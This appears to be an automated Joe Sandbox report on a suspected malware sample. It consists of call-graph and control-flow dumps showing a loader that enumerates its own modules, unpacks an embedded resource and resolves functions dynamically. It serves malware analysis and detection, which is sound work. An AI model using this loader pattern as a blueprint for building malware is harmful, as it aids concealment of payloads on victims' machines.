std::bad_alloc::bad_alloc 19138->19143 19139->18171 19140->19138 19141 40afb2 19392 40af49 19141->19392 19143->19141 19145 40d2bd __cinit 74 API calls 19143->19145 19145->19141 19147 40afca 19149 401903 lstrlenA 19148->19149 19150 4018fc 19148->19150 19404 4017e0 19149->19404 19150->18193 19153 401940 GetLastError 19155 40194b MultiByteToWideChar 19153->19155 19156 40198d 19153->19156 19154 401996 19154->18193 19157 4017e0 78 API calls 19155->19157 19156->19154 19420 401030 GetLastError 19156->19420 19158 401970 MultiByteToWideChar 19157->19158 19158->19156 19161 40af66 75 API calls 19160->19161 19162 40187c 19161->19162 19163 401885 SysAllocString 19162->19163 19164 4018a4 19162->19164 19163->19164 19164->18195 19166 40231a SafeArrayUnaccessData 19165->19166 19166->18202 19168 4019aa InterlockedDecrement 19167->19168 19173 4019df VariantClear 19167->19173 19169 4019b8 19168->19169 19168->19173 19170 4019c2 SysFreeString 19169->19170 19171 4019c9 19169->19171 19169->19173 19170->19171 19429 40aec0 19171->19429 19173->18210 19175 401571 19174->19175 19177 401582 19174->19177 19435 40afe0 19175->19435 19177->18174 19179 40b930 19178->19179 19180 40b92c 19178->19180 19179->19180 19182 40b942 _strlen 19179->19182 19187 40eeab 19179->19187 19184 40ba18 19180->19184 19182->19180 19197 40edfb 19182->19197 19391 40d606 LeaveCriticalSection 19184->19391 19186 40ba1f 19186->19131 19190 40eec6 19187->19190 19195 40ef2b 19187->19195 19188 40eecc WideCharToMultiByte 19188->19190 19188->19195 19189 411cba __calloc_crt 63 API calls 19189->19190 19190->19188 19190->19189 19191 40eeef WideCharToMultiByte 19190->19191 19190->19195 19196 40b6b5 type_info::_Type_info_dtor 63 API calls 19190->19196 19200 414d44 19190->19200 19191->19190 19192 40ef37 19191->19192 19193 40b6b5 type_info::_Type_info_dtor 63 API calls 19192->19193 19193->19195 19195->19182 19196->19190 19292 40ed0d 19197->19292 19201 414d76 19200->19201 19202 414d59 19200->19202 19204 414dd4 19201->19204 19246 417e7e 
19201->19246 19203 40bfc1 __commit 63 API calls 19202->19203 19205 414d5e 19203->19205 19206 40bfc1 __commit 63 API calls 19204->19206 19208 40e744 __commit 6 API calls 19205->19208 19235 414d6e 19206->19235 19208->19235 19210 414db5 19212 414e12 19210->19212 19213 414de7 19210->19213 19214 414dcb 19210->19214 19212->19235 19257 414c98 19212->19257 19216 411c75 __malloc_crt 63 API calls 19213->19216 19213->19235 19217 40eeab ___wtomb_environ 120 API calls 19214->19217 19219 414df7 19216->19219 19220 414dd0 19217->19220 19219->19212 19226 411c75 __malloc_crt 63 API calls 19219->19226 19219->19235 19220->19204 19220->19212 19221 414e8f 19223 414f7a 19221->19223 19227 414e98 19221->19227 19222 414e41 19225 40b6b5 type_info::_Type_info_dtor 63 API calls 19222->19225 19224 40b6b5 type_info::_Type_info_dtor 63 API calls 19223->19224 19224->19235 19230 414e4b 19225->19230 19226->19212 19228 411d54 __recalloc_crt 74 API calls 19227->19228 19227->19235 19231 414e51 _strlen 19228->19231 19229 414f5e 19233 40b6b5 type_info::_Type_info_dtor 63 API calls 19229->19233 19229->19235 19230->19231 19261 411d54 19230->19261 19231->19229 19234 411cba __calloc_crt 63 API calls 19231->19234 19231->19235 19233->19235 19236 414efb _strlen 19234->19236 19235->19190 19236->19229 19237 40ef42 _strcpy_s 63 API calls 19236->19237 19238 414f14 19237->19238 19239 414f28 SetEnvironmentVariableA 19238->19239 19240 40e61c __invoke_watson 10 API calls 19238->19240 19241 414f49 19239->19241 19242 414f52 19239->19242 19243 414f25 19240->19243 19244 40bfc1 __commit 63 API calls 19241->19244 19245 40b6b5 type_info::_Type_info_dtor 63 API calls 19242->19245 19243->19239 19244->19242 19245->19229 19266 417dc2 19246->19266 19248 414d89 19248->19204 19248->19210 19249 414cea 19248->19249 19250 414cfb 19249->19250 19254 414d3b 19249->19254 19251 411cba __calloc_crt 63 API calls 19250->19251 19252 414d12 19251->19252 19253 414d24 19252->19253 19255 40e79a __amsg_exit 63 API calls 19252->19255 19253->19254 
19273 417d6d 19253->19273 19254->19210 19255->19253 19258 414ca6 19257->19258 19259 40edfb __fassign 107 API calls 19258->19259 19260 414ccd 19258->19260 19259->19258 19260->19221 19260->19222 19264 411d5d 19261->19264 19263 411da0 19263->19231 19264->19263 19265 411d81 Sleep 19264->19265 19281 40b783 19264->19281 19265->19264 19267 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 19266->19267 19268 417dd6 19267->19268 19269 417df4 __mbschr_l 19268->19269 19270 40bfc1 __commit 63 API calls 19268->19270 19269->19248 19271 417de4 19270->19271 19272 40e744 __commit 6 API calls 19271->19272 19272->19269 19274 417d7e _strlen 19273->19274 19280 417d7a 19273->19280 19275 40b84d _malloc 63 API calls 19274->19275 19276 417d91 19275->19276 19277 40ef42 _strcpy_s 63 API calls 19276->19277 19276->19280 19278 417da3 19277->19278 19279 40e61c __invoke_watson 10 API calls 19278->19279 19278->19280 19279->19280 19280->19253 19282 40b792 19281->19282 19283 40b7ba 19281->19283 19282->19283 19284 40b79e 19282->19284 19285 40e56a __msize 64 API calls 19283->19285 19288 40b7cf 19283->19288 19287 40bfc1 __commit 63 API calls 19284->19287 19285->19288 19286 40e34f _realloc 72 API calls 19291 40b7b3 _memset 19286->19291 19289 40b7a3 19287->19289 19288->19286 19290 40e744 __commit 6 API calls 19289->19290 19290->19291 19291->19264 19293 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 19292->19293 19294 40ed21 19293->19294 19295 40ed42 19294->19295 19297 40ed75 19294->19297 19309 40ed2a 19294->19309 19296 40bfc1 __commit 63 API calls 19295->19296 19298 40ed47 19296->19298 19299 40ed99 19297->19299 19300 40ed7f 19297->19300 19304 40e744 __commit 6 API calls 19298->19304 19302 40eda1 19299->19302 19303 40edb5 19299->19303 19301 40bfc1 __commit 63 API calls 19300->19301 19305 40ed84 19301->19305 19310 414b9e 19302->19310 19330 414b5c 19303->19330 19304->19309 19308 40e744 __commit 6 API calls 19305->19308 19308->19309 19309->19182 19311 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 
19310->19311 19312 414bb2 19311->19312 19313 414bbb 19312->19313 19314 414bd3 19312->19314 19316 414c06 19312->19316 19313->19309 19315 40bfc1 __commit 63 API calls 19314->19315 19317 414bd8 19315->19317 19318 414c10 19316->19318 19319 414c2a 19316->19319 19322 40e744 __commit 6 API calls 19317->19322 19323 40bfc1 __commit 63 API calls 19318->19323 19320 414c34 19319->19320 19321 414c49 19319->19321 19335 417c1d 19320->19335 19325 414b5c ___crtCompareStringA 96 API calls 19321->19325 19322->19313 19326 414c15 19323->19326 19327 414c63 19325->19327 19328 40e744 __commit 6 API calls 19326->19328 19327->19313 19329 40bfc1 __commit 63 API calls 19327->19329 19328->19313 19329->19313 19331 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 19330->19331 19332 414b6f 19331->19332 19351 4147ec 19332->19351 19336 417c33 19335->19336 19346 417c58 ___ascii_strnicmp 19335->19346 19337 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 19336->19337 19338 417c3e 19337->19338 19339 417c43 19338->19339 19340 417c78 19338->19340 19341 40bfc1 __commit 63 API calls 19339->19341 19342 417c82 19340->19342 19350 417caa 19340->19350 19343 417c48 19341->19343 19344 40bfc1 __commit 63 API calls 19342->19344 19345 40e744 __commit 6 API calls 19343->19345 19347 417c87 19344->19347 19345->19346 19346->19313 19348 40e744 __commit 6 API calls 19347->19348 19348->19346 19349 4168fc 98 API calls __tolower_l 19349->19350 19350->19346 19350->19349 19352 414818 CompareStringW 19351->19352 19356 41482f strncnt 19351->19356 19353 41483b GetLastError 19352->19353 19352->19356 19353->19356 19354 40ce09 __atodbl_l 5 API calls 19357 414b5a 19354->19357 19355 414a95 19358 417a20 ___ansicp 87 API calls 19355->19358 19356->19355 19360 4148a4 19356->19360 19382 414881 19356->19382 19357->19309 19359 414abb 19358->19359 19362 414b1c CompareStringA 19359->19362 19364 417a69 ___convertcp 70 API calls 19359->19364 19359->19382 19361 414962 MultiByteToWideChar 19360->19361 19363 4148e6 GetCPInfo 19360->19363 
19360->19382 19369 414982 19361->19369 19361->19382 19365 414b3a 19362->19365 19362->19382 19367 4148f7 19363->19367 19363->19382 19368 414ae0 19364->19368 19366 40b6b5 type_info::_Type_info_dtor 63 API calls 19365->19366 19370 414b40 19366->19370 19367->19361 19367->19382 19375 417a69 ___convertcp 70 API calls 19368->19375 19368->19382 19376 40b84d _malloc 63 API calls 19369->19376 19381 41499f ___convertcp 19369->19381 19372 40b6b5 type_info::_Type_info_dtor 63 API calls 19370->19372 19371 4149d9 MultiByteToWideChar 19373 4149f2 MultiByteToWideChar 19371->19373 19374 414a83 19371->19374 19372->19382 19373->19374 19385 414a09 19373->19385 19378 4147ae __freea 63 API calls 19374->19378 19377 414b01 19375->19377 19376->19381 19379 414b16 19377->19379 19380 414b0a 19377->19380 19378->19382 19379->19362 19383 40b6b5 type_info::_Type_info_dtor 63 API calls 19380->19383 19381->19371 19381->19382 19382->19354 19383->19382 19384 414a53 MultiByteToWideChar 19386 414a66 CompareStringW 19384->19386 19387 414a7d 19384->19387 19388 414a1f ___convertcp 19385->19388 19389 40b84d _malloc 63 API calls 19385->19389 19386->19387 19390 4147ae __freea 63 API calls 19387->19390 19388->19374 19388->19384 19389->19388 19390->19374 19391->19186 19398 40d0f5 19392->19398 19395 40cd39 19396 40cd62 19395->19396 19397 40cd6e RaiseException 19395->19397 19396->19397 19397->19147 19399 40d115 _strlen 19398->19399 19403 40af59 19398->19403 19400 40b84d _malloc 63 API calls 19399->19400 19399->19403 19401 40d128 19400->19401 19402 40ef42 _strcpy_s 63 API calls 19401->19402 19401->19403 19402->19403 19403->19395 19405 4017f3 19404->19405 19406 4017e9 EntryPoint 19404->19406 19407 401805 19405->19407 19408 4017fb EntryPoint 19405->19408 19406->19405 19409 401818 19407->19409 19410 40180e EntryPoint 19407->19410 19408->19407 19411 401844 19409->19411 19412 40183e 19409->19412 19415 40b783 __recalloc 73 API calls 19409->19415 19410->19409 19416 40186d MultiByteToWideChar 19411->19416 19417 40184e 
EntryPoint 19411->19417 19422 40b743 19411->19422 19413 40b6b5 type_info::_Type_info_dtor 63 API calls 19412->19413 19413->19411 19418 40182d 19415->19418 19416->19153 19416->19154 19417->19411 19418->19411 19419 401834 EntryPoint 19418->19419 19419->19412 19421 401044 EntryPoint 19420->19421 19423 40e231 __calloc_impl 63 API calls 19422->19423 19424 40b75d 19423->19424 19425 40b779 19424->19425 19426 40bfc1 __commit 63 API calls 19424->19426 19425->19411 19427 40b770 19426->19427 19427->19425 19428 40bfc1 __commit 63 API calls 19427->19428 19428->19425 19430 40b6b5 __commit 19429->19430 19431 40b714 HeapFree 19430->19431 19433 40b73d __commit 19430->19433 19432 40b727 19431->19432 19431->19433 19434 40bfc1 __commit 63 API calls 19432->19434 19433->19173 19434->19433 19436 40aff8 19435->19436 19437 40b027 19436->19437 19438 40b01f __VEC_memcpy 19436->19438 19437->19177 19438->19437 19440 40e8ea __commit 19439->19440 19441 40d6e0 __lock 63 API calls 19440->19441 19442 40e8f1 19441->19442 19443 40e9ba __initterm 19442->19443 19444 40e91d 19442->19444 19458 40e9f5 19443->19458 19446 4104e9 __decode_pointer 6 API calls 19444->19446 19448 40e928 19446->19448 19450 40e9aa __initterm 19448->19450 19452 4104e9 __decode_pointer 6 API calls 19448->19452 19449 40e9f2 __commit 19449->18215 19450->19443 19457 40e93d 19452->19457 19453 40e9e9 19454 40e7ee _malloc 4 API calls 19453->19454 19454->19449 19455 4104e9 6 API calls __decode_pointer 19455->19457 19456 4104e0 6 API calls _doexit 19456->19457 19457->19450 19457->19455 19457->19456 19459 40e9d6 19458->19459 19460 40e9fb 19458->19460 19459->19449 19462 40d606 LeaveCriticalSection 19459->19462 19463 40d606 LeaveCriticalSection 19460->19463 19462->19453 19463->19459 19464 31d79308 19465 31d79348 CloseHandle 19464->19465 19467 31d79379 19465->19467

Control-flow Graph
                                                                                                                                      control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 CloseHandle GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 27 401ed6-401eed call 40ba30 7->27 28 401eef 7->28 14 401c73-401c77 8->14 16 401c93-401c95 14->16 17 401c79-401c7b 14->17 18 401c98-401c9a 16->18 20 401c7d-401c83 17->20 21 401c8f-401c91 17->21 22 401cb0-401cce call 401650 18->22 23 401c9c-401caf CloseHandle 18->23 20->16 25 401c85-401c8d 20->25 21->18 33 401cd0-401cd4 22->33 25->14 25->21 31 401ef3-401f1a call 401300 SizeofResource 27->31 28->31 38 401f1c-401f2f 31->38 39 401f5f-401f69 31->39 36 401cf0-401cf2 33->36 37 401cd6-401cd8 33->37 42 401cf5-401cf7 36->42 40 401cda-401ce0 37->40 41 401cec-401cee 37->41 43 401f33-401f5d call 401560 38->43 44 401f73-401f75 39->44 45 401f6b-401f72 39->45 40->36 46 401ce2-401cea 40->46 41->42 42->23 47 401cf9-401d09 Module32Next 42->47 43->39 49 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 44->49 50 401f77-401f8d call 401560 44->50 45->44 46->33 46->41 47->7 51 401d0f 47->51 49->5 86 4021aa-4021c0 49->86 50->49 55 401d10-401d2e call 401650 51->55 60 401d30-401d34 55->60 63 401d50-401d52 60->63 64 401d36-401d38 60->64 68 401d55-401d57 63->68 66 401d3a-401d40 64->66 67 401d4c-401d4e 64->67 66->63 70 401d42-401d4a 66->70 67->68 68->23 71 401d5d-401d7b call 401650 68->71 70->60 70->67 77 401d80-401d84 71->77 79 401da0-401da2 77->79 80 401d86-401d88 77->80 81 401da5-401da7 79->81 83 401d8a-401d90 80->83 84 401d9c-401d9e 80->84 81->23 85 401dad-401dbd Module32Next 81->85 83->79 87 401d92-401d9a 83->87 84->81 85->7 
85->55 89 4021c6-4021ca 86->89 90 40246a-402470 86->90 87->77 87->84 89->90 93 4021d0-402217 call 4018f0 89->93 91 402472-402475 90->91 92 40247a-402480 90->92 91->92 92->5 94 402482-402487 92->94 98 40221d-40223d 93->98 99 40244f-40245f 93->99 94->5 98->99 103 402243-402251 98->103 99->90 100 402461-402467 call 40b6b5 99->100 100->90 103->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 103->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-40234d call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 154 40234e call 31c2d005 122->154 155 40234e call 31c2d01d 122->155 123->122 127 402350-402352 128 402354-402355 SafeArrayDestroy 127->128 129 40235b-402361 127->129 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 133 402377-402379 131->133 134 40237b 131->134 135 40237d-40238f call 4018d0 133->135 134->135 152 402390 call 31c2d005 135->152 153 402390 call 31c2d01d 135->153 138 402392-4023a2 SafeArrayCreateVector 139 4023a4-4023a9 call 40ad90 138->139 140 4023ae-4023b4 138->140 139->140 142 4023b6-4023b8 140->142 143 4023ba 140->143 144 4023bc-402417 VariantClear * 2 call 4019a0 142->144 143->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99 152->138 153->138 154->127 155->127
APIs
• OleInitialize.OLE32(00000000), ref: 004019FD
• _getenv.LIBCMT ref: 00401ABA
• GetCurrentProcessId.KERNEL32 ref: 00401ACD
• CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
• Module32First.KERNEL32 ref: 00401C48
• CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
• Module32Next.KERNEL32(00000000,?), ref: 00401D02
• Module32Next.KERNEL32(00000000,?), ref: 00401DB6
• CloseHandle.KERNELBASE(00000000), ref: 00401DC4
• GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
• FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
• LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
• LockResource.KERNEL32(00000000), ref: 00401EA7
• SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
• _malloc.LIBCMT ref: 00401EBA
• _memset.LIBCMT ref: 00401EDD
• SizeofResource.KERNEL32(00000000,?), ref: 00401F02
Strings
Memory Dump Source
• Source File: 00000018.00000002.2685924986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.2685924986.0000000000426000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000018.00000002.2685924986.000000000045A000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_400000_rpkhzpuO.jbxd
Yara matches
Similarity
• API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
• String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
• API String ID: 1430744539-2962942730
• Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
• Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
• Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
• Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B

Control-flow Graph
                                                                                                                                      control_flow_graph 156 35182060-351820e2 160 351820e8-3518210d 156->160 161 35182326-35182359 156->161 166 35182360-35182395 160->166 167 35182113-35182138 160->167 161->166 174 3518239c-351823d1 166->174 167->174 175 3518213e-3518214e 167->175 179 351823d8-35182404 174->179 175->179 180 35182154-35182158 175->180 186 3518240b-35182449 179->186 182 3518215a-35182160 180->182 183 35182166-3518216b 180->183 182->183 182->186 187 35182179-3518217f 183->187 188 3518216d-35182173 183->188 190 35182450-3518248e 186->190 191 35182190-351821a4 187->191 192 35182181-35182189 187->192 188->187 188->190 226 35182495-3518251e 190->226 203 351821aa 191->203 204 351821a6-351821a8 191->204 192->191 208 351821af-351821c7 203->208 204->208 209 351821c9-351821cf 208->209 210 351821d1-351821d5 208->210 209->210 213 35182224-35182231 209->213 214 35182218-35182221 210->214 215 351821d7-35182203 GetActiveWindow 210->215 223 35182271 213->223 224 35182233-35182249 call 35181f90 213->224 214->213 216 3518220c-35182216 215->216 217 35182205-3518220b 215->217 216->213 217->216 255 35182271 call 35182de8 223->255 256 35182271 call 35182daf 223->256 233 35182268-3518226e 224->233 234 3518224b-35182262 224->234 252 3518252b 226->252 253 35182520-35182529 226->253 228 35182277-351822a0 call 35181f9c 236 351822a5-351822d5 228->236 233->223 234->226 234->233 236->161 254 3518252d-35182533 252->254 253->254 255->228 256->228
APIs
Strings
Memory Dump Source
• Source File: 00000018.00000002.2749536526.0000000035180000.00000040.00000800.00020000.00000000.sdmp, Offset: 35180000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_35180000_rpkhzpuO.jbxd
Similarity
• API ID: ActiveWindow
• String ID: ,l@4$xk@4$xk@4
• API String ID: 2558294473-1587194999
• Opcode ID: 7a190cac6878681b62e96c8cc49ff3e9503a65ea8f4ea2b4eb77e3ccf5c6ba5a
• Instruction ID: cb62d544b764efa5a20e2ab5f86eb22779e467a12f43aa5996f09e69bbfcc202
• Opcode Fuzzy Hash: 7a190cac6878681b62e96c8cc49ff3e9503a65ea8f4ea2b4eb77e3ccf5c6ba5a
• Instruction Fuzzy Hash: 72C16E74B003059FEB159FA5D4147AEBBE6BFC9340F148829E916AB380DF389846CB65

Control-flow Graph
                                                                                                                                      control_flow_graph 257 4018f0-4018fa 258 401903-40193e lstrlenA call 4017e0 MultiByteToWideChar 257->258 259 4018fc-401900 257->259 262 401940-401949 GetLastError 258->262 263 401996-40199a 258->263 264 40194b-40198c MultiByteToWideChar call 4017e0 MultiByteToWideChar 262->264 265 40198d-40198f 262->265 264->265 265->263 267 401991 call 401030 265->267 267->263
APIs
• lstrlenA.KERNEL32(?), ref: 00401906
• MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
• GetLastError.KERNEL32 ref: 00401940
• MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
• MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
Memory Dump Source
• Source File: 00000018.00000002.2685924986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.2685924986.0000000000426000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000018.00000002.2685924986.000000000045A000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_400000_rpkhzpuO.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$ErrorLastlstrlen
• String ID:
• API String ID: 3322701435-0
• Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
• Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
• Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
• Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8

Control-flow Graph
                                                                                                                                      control_flow_graph 270 35183690-3518372f GetCurrentProcess 275 35183738-3518376c GetCurrentThread 270->275 276 35183731-35183737 270->276 277 3518376e-35183774 275->277 278 35183775-351837a9 GetCurrentProcess 275->278 276->275 277->278 280 351837ab-351837b1 278->280 281 351837b2-351837cd call 35183870 278->281 280->281 284 351837d3-35183802 GetCurrentThreadId 281->284 285 3518380b-3518386d 284->285 286 35183804-3518380a 284->286 286->285
APIs
• GetCurrentProcess.KERNEL32 ref: 3518371E
• GetCurrentThread.KERNEL32 ref: 3518375B
• GetCurrentProcess.KERNEL32 ref: 35183798
• GetCurrentThreadId.KERNEL32 ref: 351837F1
Memory Dump Source
• Source File: 00000018.00000002.2749536526.0000000035180000.00000040.00000800.00020000.00000000.sdmp, Offset: 35180000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_35180000_rpkhzpuO.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: aa823adf57dc59c9c70211605d338fca33fd45191010f69b19d66a45542b0e98
• Instruction ID: 3723a0055e9e183fbcb18aa2d68e5c8fd0d28d91f97734cb6ea69d6cc6c3a61a
• Opcode Fuzzy Hash: aa823adf57dc59c9c70211605d338fca33fd45191010f69b19d66a45542b0e98
• Instruction Fuzzy Hash: 5B5186B4900749DFDB50DFA9D988B9EBBF1AF88310F208459E009B7350D7359841CF69

Control-flow Graph
                                                                                                                                      control_flow_graph 293 351836a0-3518372f GetCurrentProcess 297 35183738-3518376c GetCurrentThread 293->297 298 35183731-35183737 293->298 299 3518376e-35183774 297->299 300 35183775-351837a9 GetCurrentProcess 297->300 298->297 299->300 302 351837ab-351837b1 300->302 303 351837b2-351837cd call 35183870 300->303 302->303 306 351837d3-35183802 GetCurrentThreadId 303->306 307 3518380b-3518386d 306->307 308 35183804-3518380a 306->308 308->307
APIs
• GetCurrentProcess.KERNEL32 ref: 3518371E
• GetCurrentThread.KERNEL32 ref: 3518375B
• GetCurrentProcess.KERNEL32 ref: 35183798
• GetCurrentThreadId.KERNEL32 ref: 351837F1
Memory Dump Source
• Source File: 00000018.00000002.2749536526.0000000035180000.00000040.00000800.00020000.00000000.sdmp, Offset: 35180000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_35180000_rpkhzpuO.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: a46d49a7d8c0a645a35cb693126f7918ab9c151d26b8690deafb55c6d5925fa5
• Instruction ID: 1b56012314ff05409e94e20defa7f919e1cb2dd14ae977b1850288489c1efa3d
• Opcode Fuzzy Hash: a46d49a7d8c0a645a35cb693126f7918ab9c151d26b8690deafb55c6d5925fa5
• Instruction Fuzzy Hash: B75165B0900749CFDB54DFAAD988B9EBBF1AF88310F248459D009B7360DB359945CF69

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 315 40af66-40af6e 316 40af7d-40af88 call 40b84d 315->316 319 40af70-40af7b call 40d2e3 316->319 320 40af8a-40af8b 316->320 319->316 323 40af8c-40af98 319->323 324 40afb3-40afca call 40af49 call 40cd39 323->324 325 40af9a-40afb2 call 40aefc call 40d2bd 323->325 325->324
                                                                                                                                      APIs
                                                                                                                                      • _malloc.LIBCMT ref: 0040AF80
                                                                                                                                        • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                        • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                        • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                                        • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2685924986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000018.00000002.2685924986.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                      • Associated: 00000018.00000002.2685924986.000000000045A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1411284514-0
                                                                                                                                      • Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                                      • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                                                                      • Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                                      • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 334 35182056-351820e2 338 351820e8-3518210d 334->338 339 35182326-35182359 334->339 344 35182360-35182395 338->344 345 35182113-35182138 338->345 339->344 352 3518239c-351823d1 344->352 345->352 353 3518213e-3518214e 345->353 357 351823d8-35182404 352->357 353->357 358 35182154-35182158 353->358 364 3518240b-35182449 357->364 360 3518215a-35182160 358->360 361 35182166-3518216b 358->361 360->361 360->364 365 35182179-3518217f 361->365 366 3518216d-35182173 361->366 368 35182450-3518248e 364->368 369 35182190-351821a4 365->369 370 35182181-35182189 365->370 366->365 366->368 404 35182495-3518251e 368->404 381 351821aa 369->381 382 351821a6-351821a8 369->382 370->369 386 351821af-351821c7 381->386 382->386 387 351821c9-351821cf 386->387 388 351821d1-351821d5 386->388 387->388 391 35182224-35182231 387->391 392 35182218-35182221 388->392 393 351821d7-35182203 GetActiveWindow 388->393 401 35182271 391->401 402 35182233-35182249 call 35181f90 391->402 392->391 394 3518220c-35182216 393->394 395 35182205-3518220b 393->395 394->391 395->394 433 35182271 call 35182de8 401->433 434 35182271 call 35182daf 401->434 411 35182268-3518226e 402->411 412 3518224b-35182262 402->412 430 3518252b 404->430 431 35182520-35182529 404->431 406 35182277-351822a0 call 35181f9c 414 351822a5-351822d5 406->414 411->401 412->404 412->411 414->339 432 3518252d-35182533 430->432 431->432 433->406 434->406
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2749536526.0000000035180000.00000040.00000800.00020000.00000000.sdmp, Offset: 35180000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_35180000_rpkhzpuO.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ActiveWindow
                                                                                                                                      • String ID: ,l@4$xk@4
                                                                                                                                      • API String ID: 2558294473-3522002665
                                                                                                                                      • Opcode ID: b2c14653403d72c050b39706e0a1e81bab7130f51279f8bb7dd252f3ba1e6c13
